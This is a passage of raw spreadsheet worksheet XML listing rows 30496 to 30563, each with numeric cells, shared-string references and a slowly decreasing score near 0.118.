      <c r="B30496" s="2">
        <v>4.1102665E7</v>
      </c>
      <c r="C30496" s="2" t="s">
        <v>29322</v>
      </c>
      <c r="D30496" s="2">
        <v>1.0</v>
      </c>
      <c r="E30496" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30496" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30497" ht="15.75" customHeight="1">
      <c r="A30497" s="1">
        <v>15561.0</v>
      </c>
      <c r="B30497" s="2">
        <v>4.3426859E7</v>
      </c>
      <c r="C30497" s="2" t="s">
        <v>29323</v>
      </c>
      <c r="D30497" s="2">
        <v>1.0</v>
      </c>
      <c r="E30497" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30497" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30498" ht="15.75" customHeight="1">
      <c r="A30498" s="1">
        <v>18469.0</v>
      </c>
      <c r="B30498" s="2">
        <v>5.2847441E7</v>
      </c>
      <c r="C30498" s="2" t="s">
        <v>29324</v>
      </c>
      <c r="D30498" s="2">
        <v>1.0</v>
      </c>
      <c r="E30498" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30498" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30499" ht="15.75" customHeight="1">
      <c r="A30499" s="1">
        <v>22047.0</v>
      </c>
      <c r="B30499" s="2">
        <v>3.0330487E7</v>
      </c>
      <c r="C30499" s="2" t="s">
        <v>29325</v>
      </c>
      <c r="D30499" s="2">
        <v>1.0</v>
      </c>
      <c r="E30499" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30499" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30500" ht="15.75" customHeight="1">
      <c r="A30500" s="1">
        <v>25488.0</v>
      </c>
      <c r="B30500" s="2">
        <v>1.4035755E7</v>
      </c>
      <c r="C30500" s="2" t="s">
        <v>29326</v>
      </c>
      <c r="D30500" s="2">
        <v>1.0</v>
      </c>
      <c r="E30500" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30500" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30501" ht="15.75" customHeight="1">
      <c r="A30501" s="1">
        <v>26360.0</v>
      </c>
      <c r="B30501" s="2">
        <v>1.6861717E7</v>
      </c>
      <c r="C30501" s="2" t="s">
        <v>29327</v>
      </c>
      <c r="D30501" s="2">
        <v>1.0</v>
      </c>
      <c r="E30501" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30501" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30502" ht="15.75" customHeight="1">
      <c r="A30502" s="1">
        <v>28421.0</v>
      </c>
      <c r="B30502" s="2">
        <v>2.6398051E7</v>
      </c>
      <c r="C30502" s="2" t="s">
        <v>29328</v>
      </c>
      <c r="D30502" s="2">
        <v>1.0</v>
      </c>
      <c r="E30502" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30502" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30503" ht="15.75" customHeight="1">
      <c r="A30503" s="1">
        <v>31756.0</v>
      </c>
      <c r="B30503" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C30503" s="2" t="s">
        <v>29329</v>
      </c>
      <c r="D30503" s="2">
        <v>1.0</v>
      </c>
      <c r="E30503" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30503" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="30504" ht="15.75" customHeight="1">
      <c r="A30504" s="1">
        <v>16354.0</v>
      </c>
      <c r="B30504" s="2">
        <v>4.6107379E7</v>
      </c>
      <c r="C30504" s="2" t="s">
        <v>29330</v>
      </c>
      <c r="D30504" s="2">
        <v>1.0</v>
      </c>
      <c r="E30504" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30504" s="2">
        <v>0.1193078324225865</v>
      </c>
    </row>
    <row r="30505" ht="15.75" customHeight="1">
      <c r="A30505" s="1">
        <v>12009.0</v>
      </c>
      <c r="B30505" s="2">
        <v>2.6014734E7</v>
      </c>
      <c r="C30505" s="2" t="s">
        <v>29331</v>
      </c>
      <c r="D30505" s="2">
        <v>1.0</v>
      </c>
      <c r="E30505" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30505" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="30506" ht="15.75" customHeight="1">
      <c r="A30506" s="1">
        <v>12899.0</v>
      </c>
      <c r="B30506" s="2">
        <v>3.2070795E7</v>
      </c>
      <c r="C30506" s="2" t="s">
        <v>29332</v>
      </c>
      <c r="D30506" s="2">
        <v>1.0</v>
      </c>
      <c r="E30506" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30506" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="30507" ht="15.75" customHeight="1">
      <c r="A30507" s="1">
        <v>21155.0</v>
      </c>
      <c r="B30507" s="2">
        <v>1.8870271E7</v>
      </c>
      <c r="C30507" s="2" t="s">
        <v>19859</v>
      </c>
      <c r="D30507" s="2">
        <v>1.0</v>
      </c>
      <c r="E30507" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30507" s="2">
        <v>0.1191756272401434</v>
      </c>
    </row>
    <row r="30508" ht="15.75" customHeight="1">
      <c r="A30508" s="1">
        <v>27895.0</v>
      </c>
      <c r="B30508" s="2">
        <v>2.3663592E7</v>
      </c>
      <c r="C30508" s="2" t="s">
        <v>29333</v>
      </c>
      <c r="D30508" s="2">
        <v>1.0</v>
      </c>
      <c r="E30508" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30508" s="2">
        <v>0.1190476190476191</v>
      </c>
    </row>
    <row r="30509" ht="15.75" customHeight="1">
      <c r="A30509" s="1">
        <v>1991.0</v>
      </c>
      <c r="B30509" s="2">
        <v>3.0531423E7</v>
      </c>
      <c r="C30509" s="2" t="s">
        <v>29334</v>
      </c>
      <c r="D30509" s="2">
        <v>1.0</v>
      </c>
      <c r="E30509" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30509" s="2">
        <v>0.1188034188034188</v>
      </c>
    </row>
    <row r="30510" ht="15.75" customHeight="1">
      <c r="A30510" s="1">
        <v>308.0</v>
      </c>
      <c r="B30510" s="2">
        <v>1.5608189E7</v>
      </c>
      <c r="C30510" s="2" t="s">
        <v>29335</v>
      </c>
      <c r="D30510" s="2">
        <v>1.0</v>
      </c>
      <c r="E30510" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30510" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30511" ht="15.75" customHeight="1">
      <c r="A30511" s="1">
        <v>1152.0</v>
      </c>
      <c r="B30511" s="2">
        <v>2.4402259E7</v>
      </c>
      <c r="C30511" s="2" t="s">
        <v>29336</v>
      </c>
      <c r="D30511" s="2">
        <v>1.0</v>
      </c>
      <c r="E30511" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30511" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30512" ht="15.75" customHeight="1">
      <c r="A30512" s="1">
        <v>1405.0</v>
      </c>
      <c r="B30512" s="2">
        <v>2.6316212E7</v>
      </c>
      <c r="C30512" s="2" t="s">
        <v>29337</v>
      </c>
      <c r="D30512" s="2">
        <v>1.0</v>
      </c>
      <c r="E30512" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30512" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30513" ht="15.75" customHeight="1">
      <c r="A30513" s="1">
        <v>1642.0</v>
      </c>
      <c r="B30513" s="2">
        <v>2.8031274E7</v>
      </c>
      <c r="C30513" s="2" t="s">
        <v>29338</v>
      </c>
      <c r="D30513" s="2">
        <v>1.0</v>
      </c>
      <c r="E30513" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30513" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30514" ht="15.75" customHeight="1">
      <c r="A30514" s="1">
        <v>3110.0</v>
      </c>
      <c r="B30514" s="2">
        <v>3.6761113E7</v>
      </c>
      <c r="C30514" s="2" t="s">
        <v>29339</v>
      </c>
      <c r="D30514" s="2">
        <v>1.0</v>
      </c>
      <c r="E30514" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30514" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30515" ht="15.75" customHeight="1">
      <c r="A30515" s="1">
        <v>5265.0</v>
      </c>
      <c r="B30515" s="2">
        <v>4.5143425E7</v>
      </c>
      <c r="C30515" s="2" t="s">
        <v>29340</v>
      </c>
      <c r="D30515" s="2">
        <v>1.0</v>
      </c>
      <c r="E30515" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30515" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30516" ht="15.75" customHeight="1">
      <c r="A30516" s="1">
        <v>8063.0</v>
      </c>
      <c r="B30516" s="2">
        <v>5.2929811E7</v>
      </c>
      <c r="C30516" s="2" t="s">
        <v>29341</v>
      </c>
      <c r="D30516" s="2">
        <v>1.0</v>
      </c>
      <c r="E30516" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30516" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30517" ht="15.75" customHeight="1">
      <c r="A30517" s="1">
        <v>8219.0</v>
      </c>
      <c r="B30517" s="2">
        <v>5.3334292E7</v>
      </c>
      <c r="C30517" s="2" t="s">
        <v>29342</v>
      </c>
      <c r="D30517" s="2">
        <v>1.0</v>
      </c>
      <c r="E30517" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30517" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30518" ht="15.75" customHeight="1">
      <c r="A30518" s="1">
        <v>9226.0</v>
      </c>
      <c r="B30518" s="2">
        <v>5.5443069E7</v>
      </c>
      <c r="C30518" s="2" t="s">
        <v>29343</v>
      </c>
      <c r="D30518" s="2">
        <v>1.0</v>
      </c>
      <c r="E30518" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30518" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30519" ht="15.75" customHeight="1">
      <c r="A30519" s="1">
        <v>10414.0</v>
      </c>
      <c r="B30519" s="2">
        <v>9949354.0</v>
      </c>
      <c r="C30519" s="2" t="s">
        <v>29344</v>
      </c>
      <c r="D30519" s="2">
        <v>1.0</v>
      </c>
      <c r="E30519" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30519" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30520" ht="15.75" customHeight="1">
      <c r="A30520" s="1">
        <v>11102.0</v>
      </c>
      <c r="B30520" s="2">
        <v>1.8594561E7</v>
      </c>
      <c r="C30520" s="2" t="s">
        <v>29345</v>
      </c>
      <c r="D30520" s="2">
        <v>1.0</v>
      </c>
      <c r="E30520" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30520" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30521" ht="15.75" customHeight="1">
      <c r="A30521" s="1">
        <v>12119.0</v>
      </c>
      <c r="B30521" s="2">
        <v>2.6897504E7</v>
      </c>
      <c r="C30521" s="2" t="s">
        <v>29346</v>
      </c>
      <c r="D30521" s="2">
        <v>1.0</v>
      </c>
      <c r="E30521" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30521" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30522" ht="15.75" customHeight="1">
      <c r="A30522" s="1">
        <v>13062.0</v>
      </c>
      <c r="B30522" s="2">
        <v>3.3265113E7</v>
      </c>
      <c r="C30522" s="2" t="s">
        <v>29347</v>
      </c>
      <c r="D30522" s="2">
        <v>1.0</v>
      </c>
      <c r="E30522" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30522" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30523" ht="15.75" customHeight="1">
      <c r="A30523" s="1">
        <v>13886.0</v>
      </c>
      <c r="B30523" s="2">
        <v>3.7018421E7</v>
      </c>
      <c r="C30523" s="2" t="s">
        <v>29348</v>
      </c>
      <c r="D30523" s="2">
        <v>1.0</v>
      </c>
      <c r="E30523" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30523" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30524" ht="15.75" customHeight="1">
      <c r="A30524" s="1">
        <v>14800.0</v>
      </c>
      <c r="B30524" s="2">
        <v>4.0922281E7</v>
      </c>
      <c r="C30524" s="2" t="s">
        <v>29349</v>
      </c>
      <c r="D30524" s="2">
        <v>1.0</v>
      </c>
      <c r="E30524" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30524" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30525" ht="15.75" customHeight="1">
      <c r="A30525" s="1">
        <v>17150.0</v>
      </c>
      <c r="B30525" s="2">
        <v>4.8850788E7</v>
      </c>
      <c r="C30525" s="2" t="s">
        <v>29350</v>
      </c>
      <c r="D30525" s="2">
        <v>1.0</v>
      </c>
      <c r="E30525" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30525" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30526" ht="15.75" customHeight="1">
      <c r="A30526" s="1">
        <v>17391.0</v>
      </c>
      <c r="B30526" s="2">
        <v>4.9621056E7</v>
      </c>
      <c r="C30526" s="2" t="s">
        <v>29351</v>
      </c>
      <c r="D30526" s="2">
        <v>1.0</v>
      </c>
      <c r="E30526" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30526" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30527" ht="15.75" customHeight="1">
      <c r="A30527" s="1">
        <v>18937.0</v>
      </c>
      <c r="B30527" s="2">
        <v>5.4310005E7</v>
      </c>
      <c r="C30527" s="2" t="s">
        <v>29352</v>
      </c>
      <c r="D30527" s="2">
        <v>1.0</v>
      </c>
      <c r="E30527" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30527" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30528" ht="15.75" customHeight="1">
      <c r="A30528" s="1">
        <v>19884.0</v>
      </c>
      <c r="B30528" s="2">
        <v>5.7257217E7</v>
      </c>
      <c r="C30528" s="2" t="s">
        <v>29353</v>
      </c>
      <c r="D30528" s="2">
        <v>1.0</v>
      </c>
      <c r="E30528" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30528" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30529" ht="15.75" customHeight="1">
      <c r="A30529" s="1">
        <v>21444.0</v>
      </c>
      <c r="B30529" s="2">
        <v>2.2403636E7</v>
      </c>
      <c r="C30529" s="2" t="s">
        <v>29354</v>
      </c>
      <c r="D30529" s="2">
        <v>1.0</v>
      </c>
      <c r="E30529" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30529" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30530" ht="15.75" customHeight="1">
      <c r="A30530" s="1">
        <v>22197.0</v>
      </c>
      <c r="B30530" s="2">
        <v>3.1900152E7</v>
      </c>
      <c r="C30530" s="2" t="s">
        <v>29355</v>
      </c>
      <c r="D30530" s="2">
        <v>1.0</v>
      </c>
      <c r="E30530" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30530" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30531" ht="15.75" customHeight="1">
      <c r="A30531" s="1">
        <v>24797.0</v>
      </c>
      <c r="B30531" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C30531" s="2" t="s">
        <v>29356</v>
      </c>
      <c r="D30531" s="2">
        <v>1.0</v>
      </c>
      <c r="E30531" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30531" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30532" ht="15.75" customHeight="1">
      <c r="A30532" s="1">
        <v>27558.0</v>
      </c>
      <c r="B30532" s="2">
        <v>2.2403635E7</v>
      </c>
      <c r="C30532" s="2" t="s">
        <v>29354</v>
      </c>
      <c r="D30532" s="2">
        <v>1.0</v>
      </c>
      <c r="E30532" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30532" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30533" ht="15.75" customHeight="1">
      <c r="A30533" s="1">
        <v>28773.0</v>
      </c>
      <c r="B30533" s="2">
        <v>2.841829E7</v>
      </c>
      <c r="C30533" s="2" t="s">
        <v>29357</v>
      </c>
      <c r="D30533" s="2">
        <v>1.0</v>
      </c>
      <c r="E30533" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30533" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30534" ht="15.75" customHeight="1">
      <c r="A30534" s="1">
        <v>29391.0</v>
      </c>
      <c r="B30534" s="2">
        <v>3.1900151E7</v>
      </c>
      <c r="C30534" s="2" t="s">
        <v>29355</v>
      </c>
      <c r="D30534" s="2">
        <v>1.0</v>
      </c>
      <c r="E30534" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30534" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30535" ht="15.75" customHeight="1">
      <c r="A30535" s="1">
        <v>29663.0</v>
      </c>
      <c r="B30535" s="2">
        <v>3.3908488E7</v>
      </c>
      <c r="C30535" s="2" t="s">
        <v>29358</v>
      </c>
      <c r="D30535" s="2">
        <v>1.0</v>
      </c>
      <c r="E30535" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30535" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30536" ht="15.75" customHeight="1">
      <c r="A30536" s="1">
        <v>30236.0</v>
      </c>
      <c r="B30536" s="2">
        <v>3.7452257E7</v>
      </c>
      <c r="C30536" s="2" t="s">
        <v>29359</v>
      </c>
      <c r="D30536" s="2">
        <v>1.0</v>
      </c>
      <c r="E30536" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30536" s="2">
        <v>0.1185897435897435</v>
      </c>
    </row>
    <row r="30537" ht="15.75" customHeight="1">
      <c r="A30537" s="1">
        <v>13951.0</v>
      </c>
      <c r="B30537" s="2">
        <v>3.7257661E7</v>
      </c>
      <c r="C30537" s="2" t="s">
        <v>29360</v>
      </c>
      <c r="D30537" s="2">
        <v>1.0</v>
      </c>
      <c r="E30537" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30537" s="2">
        <v>0.1185737976782753</v>
      </c>
    </row>
    <row r="30538" ht="15.75" customHeight="1">
      <c r="A30538" s="1">
        <v>16923.0</v>
      </c>
      <c r="B30538" s="2">
        <v>4.8141397E7</v>
      </c>
      <c r="C30538" s="2" t="s">
        <v>29361</v>
      </c>
      <c r="D30538" s="2">
        <v>1.0</v>
      </c>
      <c r="E30538" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30538" s="2">
        <v>0.1184640522875818</v>
      </c>
    </row>
    <row r="30539" ht="15.75" customHeight="1">
      <c r="A30539" s="1">
        <v>4730.0</v>
      </c>
      <c r="B30539" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C30539" s="2" t="s">
        <v>29362</v>
      </c>
      <c r="D30539" s="2">
        <v>1.0</v>
      </c>
      <c r="E30539" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30539" s="2">
        <v>0.1184640522875817</v>
      </c>
    </row>
    <row r="30540" ht="15.75" customHeight="1">
      <c r="A30540" s="1">
        <v>29530.0</v>
      </c>
      <c r="B30540" s="2">
        <v>3.282336E7</v>
      </c>
      <c r="C30540" s="2" t="s">
        <v>29363</v>
      </c>
      <c r="D30540" s="2">
        <v>1.0</v>
      </c>
      <c r="E30540" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30540" s="2">
        <v>0.1184486373165618</v>
      </c>
    </row>
    <row r="30541" ht="15.75" customHeight="1">
      <c r="A30541" s="1">
        <v>28179.0</v>
      </c>
      <c r="B30541" s="2">
        <v>2.4992865E7</v>
      </c>
      <c r="C30541" s="2" t="s">
        <v>29364</v>
      </c>
      <c r="D30541" s="2">
        <v>1.0</v>
      </c>
      <c r="E30541" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30541" s="2">
        <v>0.1183574879227053</v>
      </c>
    </row>
    <row r="30542" ht="15.75" customHeight="1">
      <c r="A30542" s="1">
        <v>1906.0</v>
      </c>
      <c r="B30542" s="2">
        <v>2.999566E7</v>
      </c>
      <c r="C30542" s="2" t="s">
        <v>29365</v>
      </c>
      <c r="D30542" s="2">
        <v>1.0</v>
      </c>
      <c r="E30542" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30542" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="30543" ht="15.75" customHeight="1">
      <c r="A30543" s="1">
        <v>1931.0</v>
      </c>
      <c r="B30543" s="2">
        <v>3.0153534E7</v>
      </c>
      <c r="C30543" s="2" t="s">
        <v>29366</v>
      </c>
      <c r="D30543" s="2">
        <v>1.0</v>
      </c>
      <c r="E30543" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30543" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="30544" ht="15.75" customHeight="1">
      <c r="A30544" s="1">
        <v>11813.0</v>
      </c>
      <c r="B30544" s="2">
        <v>2.4538581E7</v>
      </c>
      <c r="C30544" s="2" t="s">
        <v>29367</v>
      </c>
      <c r="D30544" s="2">
        <v>1.0</v>
      </c>
      <c r="E30544" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30544" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="30545" ht="15.75" customHeight="1">
      <c r="A30545" s="1">
        <v>16510.0</v>
      </c>
      <c r="B30545" s="2">
        <v>4.6611591E7</v>
      </c>
      <c r="C30545" s="2" t="s">
        <v>29368</v>
      </c>
      <c r="D30545" s="2">
        <v>1.0</v>
      </c>
      <c r="E30545" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30545" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="30546" ht="15.75" customHeight="1">
      <c r="A30546" s="1">
        <v>18746.0</v>
      </c>
      <c r="B30546" s="2">
        <v>5.3755617E7</v>
      </c>
      <c r="C30546" s="2" t="s">
        <v>29369</v>
      </c>
      <c r="D30546" s="2">
        <v>1.0</v>
      </c>
      <c r="E30546" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30546" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="30547" ht="15.75" customHeight="1">
      <c r="A30547" s="1">
        <v>33165.0</v>
      </c>
      <c r="B30547" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C30547" s="2" t="s">
        <v>29370</v>
      </c>
      <c r="D30547" s="2">
        <v>1.0</v>
      </c>
      <c r="E30547" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30547" s="2">
        <v>0.1183127572016461</v>
      </c>
    </row>
    <row r="30548" ht="15.75" customHeight="1">
      <c r="A30548" s="1">
        <v>16515.0</v>
      </c>
      <c r="B30548" s="2">
        <v>4.6624944E7</v>
      </c>
      <c r="C30548" s="2" t="s">
        <v>29371</v>
      </c>
      <c r="D30548" s="2">
        <v>1.0</v>
      </c>
      <c r="E30548" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30548" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="30549" ht="15.75" customHeight="1">
      <c r="A30549" s="1">
        <v>21265.0</v>
      </c>
      <c r="B30549" s="2">
        <v>2.0045748E7</v>
      </c>
      <c r="C30549" s="2" t="s">
        <v>29372</v>
      </c>
      <c r="D30549" s="2">
        <v>1.0</v>
      </c>
      <c r="E30549" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30549" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="30550" ht="15.75" customHeight="1">
      <c r="A30550" s="1">
        <v>30211.0</v>
      </c>
      <c r="B30550" s="2">
        <v>3.7395961E7</v>
      </c>
      <c r="C30550" s="2" t="s">
        <v>29373</v>
      </c>
      <c r="D30550" s="2">
        <v>1.0</v>
      </c>
      <c r="E30550" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30550" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="30551" ht="15.75" customHeight="1">
      <c r="A30551" s="1">
        <v>3538.0</v>
      </c>
      <c r="B30551" s="2">
        <v>3.868905E7</v>
      </c>
      <c r="C30551" s="2" t="s">
        <v>29374</v>
      </c>
      <c r="D30551" s="2">
        <v>1.0</v>
      </c>
      <c r="E30551" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30551" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="30552" ht="15.75" customHeight="1">
      <c r="A30552" s="1">
        <v>25107.0</v>
      </c>
      <c r="B30552" s="2">
        <v>1.295972E7</v>
      </c>
      <c r="C30552" s="2" t="s">
        <v>29375</v>
      </c>
      <c r="D30552" s="2">
        <v>1.0</v>
      </c>
      <c r="E30552" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30552" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="30553" ht="15.75" customHeight="1">
      <c r="A30553" s="1">
        <v>2248.0</v>
      </c>
      <c r="B30553" s="2">
        <v>3.2344129E7</v>
      </c>
      <c r="C30553" s="2" t="s">
        <v>29376</v>
      </c>
      <c r="D30553" s="2">
        <v>1.0</v>
      </c>
      <c r="E30553" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30553" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="30554" ht="15.75" customHeight="1">
      <c r="A30554" s="1">
        <v>25721.0</v>
      </c>
      <c r="B30554" s="2">
        <v>1.4541546E7</v>
      </c>
      <c r="C30554" s="2" t="s">
        <v>29377</v>
      </c>
      <c r="D30554" s="2">
        <v>1.0</v>
      </c>
      <c r="E30554" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30554" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="30555" ht="15.75" customHeight="1">
      <c r="A30555" s="1">
        <v>1294.0</v>
      </c>
      <c r="B30555" s="2">
        <v>2.5593249E7</v>
      </c>
      <c r="C30555" s="2" t="s">
        <v>29378</v>
      </c>
      <c r="D30555" s="2">
        <v>1.0</v>
      </c>
      <c r="E30555" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30555" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="30556" ht="15.75" customHeight="1">
      <c r="A30556" s="1">
        <v>11070.0</v>
      </c>
      <c r="B30556" s="2">
        <v>1.8359292E7</v>
      </c>
      <c r="C30556" s="2" t="s">
        <v>29379</v>
      </c>
      <c r="D30556" s="2">
        <v>1.0</v>
      </c>
      <c r="E30556" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30556" s="2">
        <v>0.1180555555555555</v>
      </c>
    </row>
    <row r="30557" ht="15.75" customHeight="1">
      <c r="A30557" s="1">
        <v>6442.0</v>
      </c>
      <c r="B30557" s="2">
        <v>4.8589915E7</v>
      </c>
      <c r="C30557" s="2" t="s">
        <v>29380</v>
      </c>
      <c r="D30557" s="2">
        <v>1.0</v>
      </c>
      <c r="E30557" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30557" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="30558" ht="15.75" customHeight="1">
      <c r="A30558" s="1">
        <v>19307.0</v>
      </c>
      <c r="B30558" s="2">
        <v>5.5227339E7</v>
      </c>
      <c r="C30558" s="2" t="s">
        <v>29381</v>
      </c>
      <c r="D30558" s="2">
        <v>1.0</v>
      </c>
      <c r="E30558" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30558" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="30559" ht="15.75" customHeight="1">
      <c r="A30559" s="1">
        <v>19455.0</v>
      </c>
      <c r="B30559" s="2">
        <v>5.5738164E7</v>
      </c>
      <c r="C30559" s="2" t="s">
        <v>29382</v>
      </c>
      <c r="D30559" s="2">
        <v>1.0</v>
      </c>
      <c r="E30559" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30559" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="30560" ht="15.75" customHeight="1">
      <c r="A30560" s="1">
        <v>25443.0</v>
      </c>
      <c r="B30560" s="2">
        <v>1.3890691E7</v>
      </c>
      <c r="C30560" s="2" t="s">
        <v>29383</v>
      </c>
      <c r="D30560" s="2">
        <v>1.0</v>
      </c>
      <c r="E30560" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30560" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="30561" ht="15.75" customHeight="1">
      <c r="A30561" s="1">
        <v>26261.0</v>
      </c>
      <c r="B30561" s="2">
        <v>1.6374934E7</v>
      </c>
      <c r="C30561" s="2" t="s">
        <v>29384</v>
      </c>
      <c r="D30561" s="2">
        <v>1.0</v>
      </c>
      <c r="E30561" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30561" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="30562" ht="15.75" customHeight="1">
      <c r="A30562" s="1">
        <v>3003.0</v>
      </c>
      <c r="B30562" s="2">
        <v>3.6314771E7</v>
      </c>
      <c r="C30562" s="2" t="s">
        <v>29385</v>
      </c>
      <c r="D30562" s="2">
        <v>1.0</v>
      </c>
      <c r="E30562" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30562" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="30563" ht="15.75" customHeight="1">
      <c r="A30563" s="1">
        <v>6095.0</v>
      </c>
